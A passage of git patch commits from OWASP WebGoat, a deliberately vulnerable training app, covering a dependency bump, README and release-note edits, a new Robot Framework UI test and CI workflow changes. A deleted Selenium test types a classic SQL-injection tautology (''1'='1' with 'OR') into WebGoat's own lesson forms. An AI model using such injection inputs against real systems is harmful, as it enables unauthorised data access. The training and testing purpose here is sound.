             <button type="button" id="about-button" class="btn btn-default right_nav_button" th:title="#{about}"
                     data-toggle="modal" data-target="#about-modal">
                 <i class="fa fa-info"></i>
             </button>
+            <!-- mailto menu item -->
             <a th:href="'mailto:' + ${@environment.getProperty('webgoat.email')} + '?Subject=Webgoat%20feedback'" target="_top">
                 <button type="button" class="btn btn-default right_nav_button" data-toggle="tooltip"
                         th:title="#{contact}">

From af9ba1804018289400feb4d8f73b5ab2b23696b9 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Wed, 20 Jul 2022 18:50:11 +0200
Subject: [PATCH 164/227] Bump docker/build-push-action from 3.0.0 to 3.1.0
 (#1302)

Bumps [docker/build-push-action](https://github.com/docker/build-push-action) from 3.0.0 to 3.1.0.
- [Release notes](https://github.com/docker/build-push-action/releases)
- [Commits](https://github.com/docker/build-push-action/compare/v3.0.0...v3.1.0)

---
updated-dependencies:
- dependency-name: docker/build-push-action
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 .github/workflows/release.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index a8d81086c..28186fef0 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -88,7 +88,7 @@ jobs:
           password: ${{ secrets.DOCKERHUB_TOKEN }}
 
       - name: "Build and push"
-        uses: docker/build-push-action@v3.0.0
+        uses: docker/build-push-action@v3.1.0
         with:
           context: ./
           file: ./Dockerfile

From 260168bb3fb7c9aa7d3f2d04f9dc42d56422334c Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Tue, 19 Jul 2022 22:37:16 +0200
Subject: [PATCH 165/227] Remove automatic selection of a random port

---
 .../owasp/webgoat/server/StartWebGoat.java    | 35 -------------------
 1 file changed, 35 deletions(-)

diff --git a/src/main/java/org/owasp/webgoat/server/StartWebGoat.java b/src/main/java/org/owasp/webgoat/server/StartWebGoat.java
index ed6348264..c62dc6414 100644
--- a/src/main/java/org/owasp/webgoat/server/StartWebGoat.java
+++ b/src/main/java/org/owasp/webgoat/server/StartWebGoat.java
@@ -31,25 +31,11 @@ import org.owasp.webgoat.webwolf.WebWolf;
 import org.springframework.boot.Banner;
 import org.springframework.boot.WebApplicationType;
 import org.springframework.boot.builder.SpringApplicationBuilder;
-import org.springframework.util.SocketUtils;
-
-import java.lang.reflect.Method;
-
-import static java.util.Optional.of;
-import static java.util.Optional.ofNullable;
 
 @Slf4j
 public class StartWebGoat {
 
-    public static final String WEBGOAT_PORT = "webgoat.port";
-    public static final String WEBWOLF_PORT = "webwolf.port";
-
-    private static final int MAX_PORT = 9999;
-
     public static void main(String[] args) {
-        setEnvironmentVariableForPort(WEBGOAT_PORT, "8080");
-        setEnvironmentVariableForPort(WEBWOLF_PORT, "9090");
-
         new SpringApplicationBuilder().parent(ParentConfig.class)
                 .web(WebApplicationType.NONE).bannerMode(Banner.Mode.OFF)
                 .child(WebGoat.class)
@@ -58,25 +44,4 @@ public class StartWebGoat {
                 .web(WebApplicationType.SERVLET)
                 .run(args);
     }
-
-    private static void setEnvironmentVariableForPort(String name, String defaultValue) {
-        ofNullable(System.getProperty(name))
-                .or(() -> of(defaultValue))
-                .map(Integer::parseInt)
-                .map(port -> findPort(port))
-                .ifPresent(port -> System.setProperty(name, port));
-    }
-
-    public static String findPort(int port) {
-        try {
-            if (port == MAX_PORT) {
-                log.error("No free port found from 8080 - {}", MAX_PORT);
-                return "" + port;
-            }
-            return "" + SocketUtils.findAvailableTcpPort(port, port);
-        } catch (IllegalStateException var4) {
-            return findPort(port + 1);
-        }
-    }
-
 }

From 06b7244de71ff4ba3ed84a765871c3ed56e6cfb7 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Tue, 19 Jul 2022 23:10:12 +0200
Subject: [PATCH 166/227] Move XXE lesson to category A3: Injection

---
 src/main/java/org/owasp/webgoat/lessons/xxe/XXE.java | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/main/java/org/owasp/webgoat/lessons/xxe/XXE.java b/src/main/java/org/owasp/webgoat/lessons/xxe/XXE.java
index 76d51f78f..fd6d8f631 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xxe/XXE.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xxe/XXE.java
@@ -31,7 +31,7 @@ public class XXE extends Lesson {
 
     @Override
     public Category getDefaultCategory() {
-        return Category.A5;
+        return Category.A3;
     }
 
     @Override

From 37186e1d90122176d5eeea942a9514929e13acc1 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Tue, 19 Jul 2022 23:13:36 +0200
Subject: [PATCH 167/227] Explicity add ports to Java command

This way we don't have to mention it somewhere in the documentation it is all in one command
---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 8990a816d..63eee0ba4 100644
--- a/README.md
+++ b/README.md
@@ -50,7 +50,7 @@ docker run -it -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 -e TZ=Europe/Amster
 Download the latest WebGoat release from [https://github.com/WebGoat/WebGoat/releases](https://github.com/WebGoat/WebGoat/releases)
 
 ```shell
-java -Dfile.encoding=UTF-8 -jar webgoat-8.2.3.jar 
+java -Dfile.encoding=UTF-8 -Dwebgoat.port=8080 -Dwebwolf.port=9090 -jar webgoat-8.2.3.jar 
 ```
 
 Click the link in the log to start WebGoat.

From 4050d1817cc49ed2b0a00b2301d659a5daba59e3 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Tue, 19 Jul 2022 23:17:27 +0200
Subject: [PATCH 168/227] Move to JRE image

---
 Dockerfile | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Dockerfile b/Dockerfile
index bd9c7b58d..f4af6fed2 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,4 +1,4 @@
-FROM docker.io/eclipse-temurin:17-jdk-focal
+FROM docker.io/eclipse-temurin:17-jre-focal
 
 RUN useradd -ms /bin/bash webgoat
 RUN chgrp -R 0 /home/webgoat

From c4f16ceff6277a428a73b49354c1b0d301e98bfe Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sat, 23 Jul 2022 21:48:07 +0200
Subject: [PATCH 169/227] Update README.md

---
 README.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/README.md b/README.md
index 63eee0ba4..020e45b7a 100644
--- a/README.md
+++ b/README.md
@@ -111,8 +111,10 @@ For instance running as a jar on a Linux/macOS it will look like this:
 export EXCLUDE_CATEGORIES="CLIENT_SIDE,GENERAL,CHALLENGE"
 export EXCLUDE_LESSONS="SqlInjectionAdvanced,SqlInjectionMitigations"
 java -jar target/webgoat-8.2.3-SNAPSHOT.jar
+```
 
 Or in a docker run it would (once this version is pushed into docker hub) look like this:
+
 ```Shell
 docker run -d -p 8080:8080 -p 9090:9090 -e TZ=Europe/Amsterdam -e EXCLUDE_CATEGORIES="CLIENT_SIDE,GENERAL,CHALLENGE" -e EXCLUDE_LESSONS="SqlInjectionAdvanced,SqlInjectionMitigations" webgoat/webgoat
 ```

From 6b63aaf8b13a7277bd1fd05106fdd59e60968458 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Ren=C3=A9=20Zubcevic?= <rene@zubcevic.com>
Date: Sun, 24 Jul 2022 12:28:01 +0200
Subject: [PATCH 170/227] Robot framework (#1304)

* added Robot framework UI tests

* added Robot framework UI tests workflow

* Update test.yml

wait in workflow

* remove obsolete selenium java libs and test

* Update test.yml

push result to commit as comment

* Update test.yml

push comment does not seem to work on WebGoat PR

* clean up unrequired robot options

* update readme
---
 .github/workflows/test.yml                    |  66 +++++++++++
 pom.xml                                       |  10 --
 robot/README.md                               |  18 +++
 robot/goat.robot                              | 101 ++++++++++++++++
 .../webgoat/SeleniumIntegrationTest.java      | 111 ------------------
 5 files changed, 185 insertions(+), 121 deletions(-)
 create mode 100644 .github/workflows/test.yml
 create mode 100644 robot/README.md
 create mode 100644 robot/goat.robot
 delete mode 100644 src/it/java/org/owasp/webgoat/SeleniumIntegrationTest.java

diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml
new file mode 100644
index 000000000..c9430479c
--- /dev/null
+++ b/.github/workflows/test.yml
@@ -0,0 +1,66 @@
+name: "UI-Test"
+on:
+    pull_request:
+        paths-ignore:
+            - '.txt'
+            - '*.MD'
+            - '*.md'
+            - 'LICENSE'
+            - 'docs/**'
+    push:
+        tags-ignore:
+            - '*'
+        paths-ignore:
+            - '.txt'
+            - '*.MD'
+            - '*.md'
+            - 'LICENSE'
+            - 'docs/**'
+
+jobs:
+    build:
+        runs-on: ubuntu-latest
+        # display name of the job
+        name: "Robot framework test"
+        steps:
+            # Uses an default action to checkout the code
+            - uses: actions/checkout@v3
+            # Uses an action to add Python to the VM
+            - name: Setup Pyton
+              uses: actions/setup-python@v4
+              with:
+                  python-version: '3.7'
+                  architecture: x64
+            # Uses an action to add JDK 17 to the VM (and mvn?)
+            - name: set up JDK 17
+              uses: actions/setup-java@v3
+              with:
+                  distribution: 'temurin'
+                  java-version: 17
+                  architecture: x64
+            #Uses an action to set up a cache using a certain key based on the hash of the dependencies
+            - name: Cache Maven packages
+              uses: actions/cache@v3.0.5
+              with:
+                  path: ~/.m2
+                  key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
+                  restore-keys: ubuntu-latest-m2-
+            - uses: BSFishy/pip-action@v1
+              with:
+                  packages: |
+                      robotframework
+                      robotframework-SeleniumLibrary
+                      webdriver-manager
+            - name: Run with Maven
+              run: mvn --no-transfer-progress spring-boot:run &
+            - name: Wait to start
+              uses: ifaxity/wait-on-action@v1
+              with:
+                  resource: http://127.0.0.1:8080/WebGoat
+            - name: Test with Robotframework
+              run: python3 -m robot --variable HEADLESS:"1" --outputdir robotreport robot/goat.robot
+            #- name: Send report to commit
+           #   uses: joonvena/robotframework-reporter-action@v2.1
+            #  with:
+       #           gh_access_token: ${{ secrets.GITHUB_TOKEN }}
+          #        report_path: 'robotreport'
diff --git a/pom.xml b/pom.xml
index 66ff1c85b..3c07b76dd 100644
--- a/pom.xml
+++ b/pom.xml
@@ -514,21 +514,11 @@
             <artifactId>wiremock</artifactId>
             <scope>test</scope>
         </dependency>
-        <dependency>
-            <groupId>org.seleniumhq.selenium</groupId>
-            <artifactId>selenium-java</artifactId>
-            <scope>test</scope>
-        </dependency>
         <dependency>
             <groupId>io.rest-assured</groupId>
             <artifactId>rest-assured</artifactId>
             <scope>test</scope>
         </dependency>
-        <dependency>
-            <groupId>io.github.bonigarcia</groupId>
-            <artifactId>webdrivermanager</artifactId>
-            <scope>test</scope>
-        </dependency>
     </dependencies>
 
     <build>
diff --git a/robot/README.md b/robot/README.md
new file mode 100644
index 000000000..7acf94023
--- /dev/null
+++ b/robot/README.md
@@ -0,0 +1,18 @@
+# Install and use Robotframework
+
+## Install Chromedriver on Mac OS
+
+    brew install cask chromedriver
+    chromedriver --version
+
+Then see security settings and allow the file to run
+
+## Install
+
+    pip3 install virtualenv --user
+    python3 -m virtualenv .venv
+    source .venv/bin/activate
+    pip install robotframework
+    pip install robotframework-SeleniumLibrary
+    pip install webdriver-manager
+    robot --variable HEADLESS:"0" --variable ENDPOINT:"http://127.0.0.1:8080/WebGoat" goat.robot
diff --git a/robot/goat.robot b/robot/goat.robot
new file mode 100644
index 000000000..972fdf421
--- /dev/null
+++ b/robot/goat.robot
@@ -0,0 +1,101 @@
+*** Settings ***
+Documentation  Setup WebGoat Robotframework tests
+Library  SeleniumLibrary  timeout=100  run_on_failure=Capture Page Screenshot
+Library  String
+
+Suite Setup  Initial_Page  ${ENDPOINT}  ${BROWSER}
+Suite Teardown  Close_Page
+
+*** Variables ***
+${BROWSER}  chrome
+${SLEEP}  100
+${DELAY}  0.25
+${ENDPOINT}  http://127.0.0.1:8080/WebGoat
+${ENDPOINT_WOLF}  http://127.0.0.1:9090
+${USERNAME}  robotuser
+${PASSWORD}  password
+${HEADLESS}  ${FALSE}
+
+*** Keywords ***
+Initial_Page
+  [Documentation]  Check the inital page
+  [Arguments]  ${ENDPOINT}  ${BROWSER}
+  Log To Console  Start WebGoat UI Testing
+  IF  ${HEADLESS}
+      Open Browser  ${ENDPOINT}  ${BROWSER}  options=add_argument("-headless");add_argument("--start-maximized");add_experimental_option('prefs', {'intl.accept_languages': 'en,en_US'})  alias=webgoat
+  ELSE
+      Open Browser  ${ENDPOINT}  ${BROWSER}  options=add_experimental_option('prefs', {'intl.accept_languages': 'en,en_US'})  alias=webgoat
+  END
+  IF  ${HEADLESS}
+      Open Browser  ${ENDPOINT_WOLF}/WebWolf  ${BROWSER}  options=add_argument("-headless");add_argument("--start-maximized");add_experimental_option('prefs', {'intl.accept_languages': 'en,en_US'})  alias=webwolf
+  ELSE
+      Open Browser  ${ENDPOINT_WOLF}/WebWolf  ${BROWSER}  options=add_experimental_option('prefs', {'intl.accept_languages': 'en,en_US'})  alias=webwolf
+  END
+  Switch Browser  webgoat
+  Maximize Browser Window
+  Set Window Size  ${1400}  ${1000}
+  Switch Browser  webwolf
+  Maximize Browser Window
+  Set Window Size  ${1400}  ${1000}
+  Set Window Position  ${400}  ${200}
+  Set Selenium Speed  ${DELAY}
+
+Close_Page
+  [Documentation]  Closing the browser
+  Log To Console  ==> Stop WebGoat UI Testing
+  IF  ${HEADLESS}
+    Switch Browser  webgoat
+    Close Browser
+    Switch Browser  webwolf
+    Close Browser
+  END
+
+*** Test Cases ***
+
+Check_Initial_Page
+  Switch Browser  webgoat
+  Page Should Contain  Username
+  Click Button  Sign in
+  Page Should Contain  Invalid username
+  Click Link  /WebGoat/registration
+
+Check_Registration_Page
+  Page Should Contain  Username
+  Input Text  username  ${USERNAME}
+  Input Text  password  ${PASSWORD}
+  Input Text  matchingPassword  ${PASSWORD}
+  Click Element  agree
+  Click Button  Sign up
+
+Check_Welcome_Page
+  Page Should Contain  WebGoat
+  Go To  ${ENDPOINT}/login
+  Page Should Contain  Username
+  Input Text  username  ${USERNAME}
+  Input Text  password  ${PASSWORD}
+  Click Button  Sign in
+  Page Should Contain  WebGoat
+
+Check_Menu_Page
+  Click Element  css=a[category='Introduction']
+  Click Element  Introduction-WebGoat
+  CLick Element  Introduction-WebWolf
+  Click Element  css=a[category='General']
+  CLick Element  General-HTTPBasics
+  Click Element  xpath=//*[.='2']
+  Input Text     person  ${USERNAME}
+  Click Button   Go!
+  ${OUT_VALUE}   Get Text  xpath=//div[contains(@class, 'attack-feedback')]
+  ${OUT_RESULT}  Evaluate  "resutobor" in """${OUT_VALUE}"""
+  IF  not ${OUT_RESULT}
+    Fail  "not ok"
+  END
+
+Check_WebWolf
+  Switch Browser  webwolf
+  location should be  ${ENDPOINT_WOLF}/WebWolf
+  Go To  ${ENDPOINT_WOLF}/mail
+  Input Text  username  ${USERNAME}
+  Input Text  password  ${PASSWORD}
+  Click Button  Sign In
+
diff --git a/src/it/java/org/owasp/webgoat/SeleniumIntegrationTest.java b/src/it/java/org/owasp/webgoat/SeleniumIntegrationTest.java
deleted file mode 100644
index beb3b71aa..000000000
--- a/src/it/java/org/owasp/webgoat/SeleniumIntegrationTest.java
+++ /dev/null
@@ -1,111 +0,0 @@
-package org.owasp.webgoat;
-
-import java.util.concurrent.TimeUnit;
-
-import org.junit.jupiter.api.AfterEach;
-import org.junit.jupiter.api.BeforeEach;
-import org.junit.jupiter.api.Test;
-import org.openqa.selenium.By;
-import org.openqa.selenium.WebDriver;
-import org.openqa.selenium.firefox.FirefoxBinary;
-import org.openqa.selenium.firefox.FirefoxDriver;
-import org.openqa.selenium.firefox.FirefoxOptions;
-
-import io.github.bonigarcia.wdm.WebDriverManager;
-import io.github.bonigarcia.wdm.config.DriverManagerType;
-
-public class SeleniumIntegrationTest extends IntegrationTest {
-
-	static {
-		try {
-			WebDriverManager.getInstance(DriverManagerType.FIREFOX).setup();
-		} catch (Exception e) {
-			//sometimes a 403 cause an ExceptionInInitializerError
-		}
-	}
-	private WebDriver driver;
-
-	@BeforeEach
-	public void setUpAndLogin() {
-		try {
-			FirefoxBinary firefoxBinary = new FirefoxBinary();
-			firefoxBinary.addCommandLineOptions("--headless");
-
-			FirefoxOptions firefoxOptions = new FirefoxOptions();
-			firefoxOptions.setBinary(firefoxBinary);
-			driver = new FirefoxDriver(firefoxOptions);
-			driver.get(url("/login"));
-			driver.manage().timeouts().implicitlyWait(30, TimeUnit.SECONDS);
-			// Login
-			driver.findElement(By.name("username")).sendKeys(this.getUser());
-			driver.findElement(By.name("password")).sendKeys("password");
-			driver.findElement(By.className("btn")).click();
-
-			// Check if user exists. If not, create user.
-			if (driver.getCurrentUrl().equals(url("/login?error"))) {
-				driver.get(url("/registration"));
-				driver.findElement(By.id("username")).sendKeys(this.getUser());
-				driver.findElement(By.id("password")).sendKeys("password");
-				driver.findElement(By.id("matchingPassword")).sendKeys("password");
-				driver.findElement(By.name("agree")).click();
-				driver.findElement(By.className("btn-primary")).click();
-			}
-		} catch (Exception e) {
-			System.err.println("Selenium test failed "+System.getProperty("webdriver.gecko.driver")+", message: "+e.getMessage());
-		}
-
-	}
-
-	@AfterEach
-	public void tearDown() {
-		if (null != driver) {
-			driver.close();
-		}
-	}
-
-	@Test
-	public void sqlInjection() {
-		
-		if (null==driver) return;
-
-		driver.get(url("/start.mvc#lesson/SqlInjection.lesson"));
-		driver.get(url("/start.mvc#lesson/SqlInjection.lesson/1"));
-		driver.findElement(By.id("restart-lesson-button")).click();
-		driver.get(url("/start.mvc#lesson/SqlInjection.lesson/0"));
-		driver.get(url("/start.mvc#lesson/SqlInjection.lesson/1"));
-		driver.findElement(By.name("query")).sendKeys(SqlInjectionLessonIntegrationTest.sql_2);
-		driver.findElement(By.name("query")).submit();
-
-		driver.get(url("/start.mvc#lesson/SqlInjection.lesson/2"));
-		driver.findElements(By.name("query")).get(1).sendKeys(SqlInjectionLessonIntegrationTest.sql_3);
-		driver.findElements(By.name("query")).get(1).submit();
-
-		driver.get(url("/start.mvc#lesson/SqlInjection.lesson/3"));
-		driver.findElements(By.name("query")).get(2).sendKeys(SqlInjectionLessonIntegrationTest.sql_4_drop);
-		driver.findElements(By.name("query")).get(2).submit();
-
-		driver.get(url("/start.mvc#lesson/SqlInjection.lesson/3"));
-		driver.findElements(By.name("query")).get(2).clear();
-		driver.findElements(By.name("query")).get(2).sendKeys(SqlInjectionLessonIntegrationTest.sql_4_add);
-		driver.findElements(By.name("query")).get(2).submit();
-		driver.findElements(By.name("query")).get(2).clear();
-		driver.findElements(By.name("query")).get(2).sendKeys(SqlInjectionLessonIntegrationTest.sql_4_drop);
-		driver.findElements(By.name("query")).get(2).submit();
-
-		driver.get(url("/start.mvc#lesson/SqlInjection.lesson/4"));
-		driver.findElements(By.name("query")).get(3).sendKeys(SqlInjectionLessonIntegrationTest.sql_5);
-		driver.findElements(By.name("query")).get(3).submit();
-
-		driver.get(url("/start.mvc#lesson/SqlInjection.lesson/8"));
-		driver.findElement(By.name("account")).sendKeys("Smith'");
-		driver.findElement(By.name("operator")).sendKeys("OR");
-		driver.findElement(By.name("injection")).sendKeys("'1'='1");
-		driver.findElement(By.name("Get Account Info")).click();
-
-		driver.get(url("/start.mvc#lesson/SqlInjection.lesson/9"));
-		driver.findElement(By.name("userid")).sendKeys(SqlInjectionLessonIntegrationTest.sql_10_userid);
-		driver.findElement(By.name("login_count")).sendKeys(SqlInjectionLessonIntegrationTest.sql_10_login_count);
-		driver.findElements(By.name("Get Account Info")).get(1).click();
-	}
-
-}

From 928bc32f4f2b8e42acbbde4a7c3f9d7202c01815 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sun, 24 Jul 2022 15:33:35 +0200
Subject: [PATCH 171/227] Update README.md

---
 README.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index 020e45b7a..fba54fa9e 100644
--- a/README.md
+++ b/README.md
@@ -93,10 +93,10 @@ Now we are ready to run the project. WebGoat 8.x is using Spring-Boot.
 ./mvnw.cmd spring-boot:run
 
 ```
-... you should be running WebGoat on localhost:8080/WebGoat momentarily
+... you should be running WebGoat on http://localhost:8080/WebGoat momentarily.
 
 
-To change the IP address add the following variable to the `WebGoat/webgoat-container/src/main/resources/application.properties file`:
+To change the IP address add the following variable to the `WebGoat/webgoat-container/src/main/resources/application.properties` file:
 
 ```
 server.address=x.x.x.x

From 126ead229050773ae125938e217c062267bf389c Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 24 Jul 2022 10:59:05 +0200
Subject: [PATCH 172/227] Add release notes

---
 RELEASE_NOTES.md | 11 +++++++++++
 1 file changed, 11 insertions(+)

diff --git a/RELEASE_NOTES.md b/RELEASE_NOTES.md
index ef55b382d..6263ff392 100644
--- a/RELEASE_NOTES.md
+++ b/RELEASE_NOTES.md
@@ -19,6 +19,17 @@
 - Maven build now start WebGoat jar with Maven plugin to make sure we run against the latest build.
 - Added `Initializable` interface for a lesson, an assignment can implement this interface to set it up for a specific user and to reset the assignment back to its original state when a reset lesson occurs. See `BlindSendFileAssignment` for an example.
 - Integration tests now use the same user. This saves a lot of time as before every test used a different user which triggered the Flyway migration to set up the database schema for the user. This migration took a lot of time.
+- Updated introduction lesson to WebWolf.
+- Added language switch for support for multiple languages.
+- Removed logic to start WebGoat on a random port when port `8080` is taken. We would loop until we found a free port. We simplified this to just start on the specified port.
+- [#1039 New OWASP Top 10](https://github.com/WebGoat/WebGoat/issues/1093)
+- [#1193 Vulnerable component lesson - java.desktop does not "opens java.beans" to unnamed module](https://github.com/WebGoat/WebGoat/issues/1193)
+- [#1176 Minor: XXE lesson 12 patch not reset by 'lesson reset' while it IS reset by leaving/returning to lesson](https://github.com/WebGoat/WebGoat/issues/1176)
+- [#1134 "Exploiting XStream" assignment does not work](https://github.com/WebGoat/WebGoat/issues/1134)
+- [#1130 Typo: Using Indrect References](https://github.com/WebGoat/WebGoat/issues/1130)
+- [#1101 SQL lesson not correct](https://github.com/WebGoat/WebGoat/issues/1101)
+- [#1079 startup.sh issues of WebWolf - cannot connect to the WebGoat DB](https://github.com/WebGoat/WebGoat/issues/1079)
+- [#1065 New lesson about logging](https://github.com/WebGoat/WebGoat/issues/1065)
 
 ## Version 8.2.2
 

From 37163a99a62f7d05c94b74da8cba80130f47f88d Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 24 Jul 2022 10:59:16 +0200
Subject: [PATCH 173/227] Remove unused script

---
 start.sh | 52 ----------------------------------------------------
 1 file changed, 52 deletions(-)
 delete mode 100755 start.sh

diff --git a/start.sh b/start.sh
deleted file mode 100755
index 89fad85b2..000000000
--- a/start.sh
+++ /dev/null
@@ -1,52 +0,0 @@
-#!/bin/bash
-
-cd /home/webgoat 
-
-function webgoat() {
-  echo "Starting WebGoat...."
-  java \
-   -Duser.home=/home/webgoat \
-   -Dfile.encoding=UTF-8 \
-   --add-opens java.base/java.lang=ALL-UNNAMED \
-   --add-opens java.base/java.util=ALL-UNNAMED \
-   --add-opens java.base/java.lang.reflect=ALL-UNNAMED \
-   --add-opens java.base/java.text=ALL-UNNAMED \
-   --add-opens java.desktop/java.beans=ALL-UNNAMED \
-   --add-opens java.desktop/java.awt.font=ALL-UNNAMED \
-   --add-opens java.base/sun.nio.ch=ALL-UNNAMED \
-   --add-opens java.base/java.io=ALL-UNNAMED \
-   --add-opens java.base/java.util=ALL-UNNAMED \
-   -Dwebgoat.host=0.0.0.0 -Dwebwolf.host=0.0.0.0 -Dwebgoat.port=8080 -Dwebwolf.port=9090 \
-   -jar webgoat.jar > webgoat.log
-}
-
-function write_start_message() {
-  until $(curl --output /dev/null --silent --head --fail http://0.0.0.0:8080/WebGoat/health); do
-    sleep 2
-  done
-  echo "
-    __          __       _        _____                   _
-    \ \        / /      | |      / ____|                 | |
-     \ \  /\  / /  ___  | |__   | |  __    ___     __ _  | |_
-      \ \/  \/ /  / _ \ | '_ \  | | |_ |  / _ \   / _' | | __|
-       \  /\  /  |  __/ | |_) | | |__| | | (_) | | (_| | | |_
-        \/  \/    \___| |_.__/   \_____|  \___/   \__,_|  \__|
-  " >> webgoat.log
-  echo $'WebGoat successfully started...\n' >> webgoat.log
-  echo "NOTE: port numbers mentioned below may vary depending on your port mappings while starting the Docker container" >> webgoat.log
-  echo "Browse to http://localhost:8080/WebGoat to get started." >> webgoat.log
-}
-
-function tail_log_file() {
-  touch webgoat.log
-  tail -300f webgoat.log
-}
-
-commandline_args=("$@")
-
-webgoat &
-write_start_message &
-tail_log_file
-
-
-

From 242fdf39a16ecf23139bbf69656197479eec578b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sun, 24 Jul 2022 16:29:19 +0200
Subject: [PATCH 174/227] Fixes #1233 - Path traversal seems to contain wrong
 description

---
 .../path_traversal/documentation/PathTraversal_upload.adoc      | 2 +-
 .../path_traversal/documentation/PathTraversal_upload_fix.adoc  | 2 +-
 .../documentation/PathTraversal_upload_remove_user_input.adoc   | 2 +-
 .../documentation/PathTraversal_zip_slip_assignment.adoc        | 2 +-
 4 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload.adoc b/src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload.adoc
index 422ac170f..21ccc0a00 100644
--- a/src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload.adoc
+++ b/src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload.adoc
@@ -7,6 +7,6 @@ so you need to upload your file to the following location outside the usual uplo
 |OS |Location
 
 |`operatingSystem:os[]`
-|`webGoatTempDir:temppath[]PathTraversal/username:user[]`
+|`webGoatTempDir:temppath[]PathTraversal`
 
 |===
diff --git a/src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_fix.adoc b/src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_fix.adoc
index f298922fa..a0ba72fc6 100644
--- a/src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_fix.adoc
+++ b/src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_fix.adoc
@@ -7,5 +7,5 @@ Again the same assignment, but can you bypass the implemented fix?
 |OS |Location
 
 |`operatingSystem:os[]`
-|`webGoatTempDir:temppath[]PathTraversal/username:user[]`
+|`webGoatTempDir:temppath[]PathTraversal`
 |===
diff --git a/src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_remove_user_input.adoc b/src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_remove_user_input.adoc
index 248267075..153e5add8 100644
--- a/src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_remove_user_input.adoc
+++ b/src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_remove_user_input.adoc
@@ -9,6 +9,6 @@ Again the same assignment, but can you bypass the implemented fix?
 |OS |Location
 
 |`operatingSystem:os[]`
-|`webGoatTempDir:temppath[]PathTraversal/username:user[]`
+|`webGoatTempDir:temppath[]PathTraversal`
 
 |===
diff --git a/src/main/resources/lessons/path_traversal/documentation/PathTraversal_zip_slip_assignment.adoc b/src/main/resources/lessons/path_traversal/documentation/PathTraversal_zip_slip_assignment.adoc
index fabbb19db..b96dc4d9e 100644
--- a/src/main/resources/lessons/path_traversal/documentation/PathTraversal_zip_slip_assignment.adoc
+++ b/src/main/resources/lessons/path_traversal/documentation/PathTraversal_zip_slip_assignment.adoc
@@ -6,7 +6,7 @@ This time the developers only allow you to upload zip files. However, they made
 |OS |Location
 
 |`operatingSystem:os[]`
-|`webGoatTempDir:temppath[]PathTraversal/username:user[]`
+|`webGoatTempDir:temppath[]PathTraversal`
 
 |===
 

From 71afc6b6f3f27f9a1558cf3b586b1386bce2569d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Ren=C3=A9=20Zubcevic?= <rene@zubcevic.com>
Date: Mon, 25 Jul 2022 09:55:24 +0200
Subject: [PATCH 175/227] Workflow fix (#1311)

* conditional step

* conditional step
---
 .github/workflows/test.yml | 16 +++++++++-------
 1 file changed, 9 insertions(+), 7 deletions(-)

diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml
index c9430479c..8a5859d11 100644
--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -8,8 +8,8 @@ on:
             - 'LICENSE'
             - 'docs/**'
     push:
-        tags-ignore:
-            - '*'
+#        tags-ignore:
+#            - '*'
         paths-ignore:
             - '.txt'
             - '*.MD'
@@ -59,8 +59,10 @@ jobs:
                   resource: http://127.0.0.1:8080/WebGoat
             - name: Test with Robotframework
               run: python3 -m robot --variable HEADLESS:"1" --outputdir robotreport robot/goat.robot
-            #- name: Send report to commit
-           #   uses: joonvena/robotframework-reporter-action@v2.1
-            #  with:
-       #           gh_access_token: ${{ secrets.GITHUB_TOKEN }}
-          #        report_path: 'robotreport'
+            # send report to forks only due to limits on permission tokens
+            - name: Send report to commit
+              if: github.repository != 'WebGoat/WebGoat' && github.event_name == 'push'
+              uses: joonvena/robotframework-reporter-action@v2.1
+              with:
+                  gh_access_token: ${{ secrets.GITHUB_TOKEN }}
